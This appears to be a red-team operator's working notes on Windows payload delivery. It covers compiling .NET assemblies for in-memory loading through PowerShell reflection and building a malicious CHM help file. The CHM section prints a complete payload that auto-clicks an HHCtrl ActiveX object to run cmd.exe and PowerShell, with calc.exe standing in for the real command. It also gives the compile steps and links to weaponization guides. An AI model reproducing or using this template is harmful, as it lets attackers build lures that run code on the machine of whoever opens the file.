Windows Specific

.NET PowerShell Reflection
ARRFFG

.NET Version
If you are trying to detonate in an environment using PowerShell <5 (Most companies are only going to be using standard powershell) you MUST make sure that the  output/resulting binary targets a lower/longlife version of .NET. For instance, net48/net4.0. 

 If you do not, PowerShell will fail to load the assemblies and you will have NO idea why. Use net4.8. 

 1. Download the 4.8 SDK: 

 https://dotnet.microsoft.com/en-us/download/dotnet-framework/thank-you/net481-developer-pack-offline-installer 

 2. Change the .csproj 

 <Project Sdk="Microsoft.NET.Sdk">

 <PropertyGroup>

 <OutputType>Exe</OutputType>

 <TargetFramework>net48</TargetFramework>

 </PropertyGroup>

</Project> 

 Remove the auto imports and the nullable fields, these will throw errors. 

 3. Compile 

 dotnet build --self-contained true /p:PublishSingleFile=true 

 4. You can now use reflection in most environments. 

 PS > $k = [IO.file]::ReadAllBytes("ABS_PATH")

PS > b = [Reflection.Assembly]::Load($k)

PS > b.GetTypes()

IsPublic IsSerial Name BaseType

-------- -------- ---- --------

True False Constants System.Object

True False Program System.Object

PS C:\Users\vacod\source\repos\ConsoleApp1\ConsoleApp1> [Test.Constants]::k

12

COM
Component Object Models

References
https://learn.microsoft.com/en-us/windows/win32/com/component-object-model--com--portal 

 https://en.wikipedia.org/wiki/Component_Object_Model 

 https://learn.microsoft.com/en-us/windows/win32/com/com-fundamentals 

 https://learn.microsoft.com/en-us/dotnet/csharp/advanced-topics/interop/ 

 https://learn.microsoft.com/en-us/windows/win32/com/the-component-object-model

CHM
Creating a CHM can be done using the Free Pascal Compiler or Ide on Linux 

 sudo apt-get install fp-ide

sudo apt-get install fp-compiler 

 The CHM can be compiled using the installed 'chmcmd' program. 

 

 Guide 

 Thanks, Copilot: 

 📁 Step-by-Step Guide 

 Make Content 

 MyHelpProject/

├── index.html

├── topic1.html

├── topic2.html

├── styles.css

└── images/

 └── example.png 

 Embed a Payload 

 <html>

<body>

 Hello world

 <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>

 <PARAM name="Command" value="ShortCut">

 <PARAM name="Button" value="Bitmap::shortcut">

 <PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command C:\Windows\System32\calc.exe">

 <PARAM name="Item2" value="273,1,1">

 </OBJECT>

 <SCRIPT>

 x.Click();

 </SCRIPT>

</body>

</html> 

 Create the Project (.hhp file)  

 Note the following reference on the format 

 [OPTIONS]

Title=CHM

Default topic=file1.htm

Compiled file=chm.chm

Index file=index.htm

[FILES]

index.htm

file1.htm 

 Compile 

 chmcmd project.hhp 

 This will produce project.chm. 

 On Linux, you may need libchm or chmcmd compiled with support for it. 

 

 References: 

 

 https://wiki.freepascal.org/htmlhelp_compiler 

 https://www.nongnu.org/chmspec/latest/ 

 

 https://learn.microsoft.com/en-us/previous-versions/windows/desktop/htmlhelp/creating-a-project-file 

 https://www.alexthayer.com/UsingHHPFiles.pdf 

 

 https://medium.com/r3d-buck3t/weaponize-chm-files-with-powershell-nishang-c98b93f79f1e 

 https://www.forcepoint.com/blog/x-labs/microsoft-compiled-html-help-threat 

 https://github.com/v4resk/red-book/blob/main/redteam/weapon/code-execution/html-help-files.md